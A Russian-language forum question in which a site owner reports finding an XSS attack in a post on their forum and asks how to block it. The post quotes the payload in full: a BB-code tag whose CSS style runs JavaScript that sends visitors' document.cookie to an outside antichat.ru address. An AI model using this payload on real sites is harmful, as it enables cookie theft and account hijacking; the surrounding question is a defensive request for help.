Вроде это называется XSS. Короче после одной из такой фишек я вроде все bb теги отключил кроме форматирования и т. д. ВОт сегодня обнаружил у себя на форуме ссылку с текстом
[[/topic]
... Посмотрел ссылку при навединии... Она ведёт куда-то хз куда с передачей cookie
Походу XSS ещё работет Чего ещё отключить чтобы не пахало? Или вообще есть какая-нить защита от этого?
Вот пост, который там был:
[post=1000[topic=wj style=background:url(java script:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/topic]][/post]
завтра надо обсудить
Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.
Вопрос
DPAKOH
Вроде это называется XSS. Короче после одной из такой фишек я вроде все bb теги отключил кроме форматирования и т. д. ВОт сегодня обнаружил у себя на форуме ссылку с текстом
... Посмотрел ссылку при навединии... Она ведёт куда-то хз куда с передачей cookie![:D](//forums.ibresource.ru/applications/core/interface/js/spacer.png)
Походу XSS ещё работет
Чего ещё отключить чтобы не пахало? Или вообще есть какая-нить защита от этого?
Вот пост, который там был:
Ссылка на комментарий
Поделиться на других сайтах
1 ответ на этот вопрос
Рекомендуемые сообщения
Присоединиться к обсуждению
Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.